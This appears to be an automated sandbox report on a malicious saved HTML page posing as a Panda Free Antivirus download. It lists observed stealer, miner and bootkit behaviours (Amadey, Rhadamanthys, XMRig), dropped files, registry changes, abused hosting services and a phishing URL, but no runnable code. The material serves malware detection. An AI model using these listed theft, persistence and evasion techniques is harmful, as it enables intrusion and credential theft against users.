Malware Analysis Report

2024-11-30 02:15

Sample ID 240326-n9lz1scf8y
Target Panda Free Antivirus - Free download and software reviews - CNET Download.html
SHA256 fa05724ca2250316e8ea410d385a3a9f149e7f3678cac1016343174d16827d43
Tags
amadey rhadamanthys xmrig bootkit discovery evasion miner motw persistence phishing spyware stealer trojan upx
score
10/10

Analysis Overview

score
10/10

SHA256

fa05724ca2250316e8ea410d385a3a9f149e7f3678cac1016343174d16827d43

Threat Level: Known bad

The file Panda Free Antivirus - Free download and software reviews - CNET Download.html was found to be: Known bad.

Malicious Activity Summary

amadey rhadamanthys xmrig bootkit discovery evasion miner motw persistence phishing spyware stealer trojan upx

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Rhadamanthys

XMRig Miner payload

Stops running service(s)

Blocklisted process makes network request

Creates new service(s)

Downloads MZ/PE file

Reads WinSCP keys stored on the system

Checks computer location settings

UPX packed file

Loads dropped DLL

Reads local data of messenger clients

Reads user/profile data of web browsers

Executes dropped EXE

Writes to the Master Boot Record (MBR)

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Mark of the Web detected: This indicates that the page was originally saved or cloned.

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Checks processor information in registry

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 12:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 12:05

Reported

2024-03-26 12:26

Platform

win10v2004-20240226-en

Max time kernel

1241s

Max time network

1232s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2236 created 2384 N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 C:\Windows\system32\sihost.exe
PID 2284 created 3496 N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif C:\Windows\Explorer.EXE

xmrig

miner xmrig

XMRig Miner payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\Launhcer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\3plugin0324 N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\winrar.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\winrar.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\winrar.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0324 N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-700.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-700.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
N/A N/A C:\Users\Admin\Downloads\ClassicShell.exe N/A
N/A N/A C:\Users\Admin\Downloads\IconDance.exe N/A
N/A N/A C:\Users\Admin\Downloads\DesktopPuzzle.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A camo.githubusercontent.com N/A N/A

Mark of the Web detected: This indicates that the page was originally saved or cloned.

phishing motw
Description Indicator Process Target
N/A https://olegariohombre.com/ N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Downloads\ClassicShell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4128 set thread context of 5132 N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe C:\Windows\system32\conhost.exe
PID 4128 set thread context of 4104 N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe C:\Windows\system32\dwm.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Roaming\services\3plugin0324 N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\plugin3944
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0 = [data omitted] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 = [data omitted] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "17110988,7153487,39965824,41816131,7202265,5804129,17110992,7202269,41484365,24262478,9179409,17962391,508368333,17962392,25036127,24262477,3462423,3702920,3700754,3965062,24262474,4297094,7153421,3462365,18716193,7153435,24262473,9179410,20502174,6308191,18407617,39125643,539756558,6104718,9179411,51475283,41185282,39389248,539756557,528570079" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.6 = [data omitted] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"oifxXcYG5TtLvZoogJ5HQJvoH6f6oyQgMHpiuT6xHAQ=\"" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.12 = [data omitted]
03a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f6354696c696e675c22203a207b205c224576656e74735c22203a207b205c2254696c696e6749646c6542756e646c654576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c654865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c654669726542756e646c65644576656e74735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e7456696577476574456e756d657261746f724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e7456696577446973636f6e6e6563745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e745669657753696e6b52656769737465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e745669657753696e6b556e72656769737465725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436f417574686f72696e675c22203a207b205c224576656e74735c22203a207b205c224f6373446f776e6c6f6164526566557064617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244796e616d696353617665496e697469616c496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22507573684f70526571756573745374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22507573684f70436f6d706c657465645374617475735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2254687265655761794d657267655c22203a207b205c224576656e74735c22203a207b205c22435254435265766572745265706c61794b706f7353636f70654475726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c65536176655c22203a207b205c224576656e74735c22203a207b205c22436d645361766546696c65436f7265325c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2255494d5c22203a207b205c224576656e74735c22203a207b205c224655494d426567696e556e646f4265666f726546426567696e5
56e646f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224655494d426567696e556e646f416674657246426567696e556e646f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224163636573736962696c6974795c22203a207b205c224576656e74735c22203a207b205c22416363436865636b657256696f6c6174696f6e547970655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2247726170686963735c22203a207b205c224576656e74735c22203a207b205c2245326f496e666f466f72446f63756d656e74436f6e7461696e696e674475706c696361746541727469645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446961676e6f737469635c22203a207b205c224576656e74735c22203a207b205c22496e636f73697374656e74526561644f6e6c79446f6350726f70657274795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22547261636b4368616e6765735c22203a207b205c224576656e74735c22203a207b205c22557463547261636b4368616e67657341646465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2255736572507265666572656e63655c22203a207b205c224576656e74735c22203a207b205c225365744972665c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e4368616e6765476174652e4361636865456e726963686d656e74416363657373546f6b656e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e526573656172636865722e4e6f64654a5357656250616765457874726163746f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e48656c704974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e48656c7050726f7669646572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e497350656f706c654974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6
963726f736f66742e4f66666963652e5543492e54656c6c4d652e4d616a6f724974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e4d6178436f6d6d616e64526573756c7473546f52657475726e222c20225622203a2022696e7433325f747c3422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e506172616d657465725465726d50726564696374696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e51756572794c6f6767696e67456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e536861726564446f63756d656e74456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e53686f756c6453686f7748656c70416374696f6e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e53686f774f6e6c794974656d4c6162656c49664465736372697074696f6e49734e756c6c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e57617465726d61726b506172616d65746572697a6174696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e5a65726f417373697374616e6365526573756c7473456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e4973506572736f6e6150726f66696c65504358456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e52656d6f76654d53414148616e646c6572466f7254657874426f78222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5465616368696e6743616c6c6f757454696d654f6e53637265656e54656c656d65747279222c20225
622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5468656d696e672e5573654d656469756d4c756d696e616e63655468726573686f6c64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5569614e6f74696669636174696f6e73466f72427573426172456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e556961 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|5" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|11" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1711498909" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133559283764396213" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|7" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
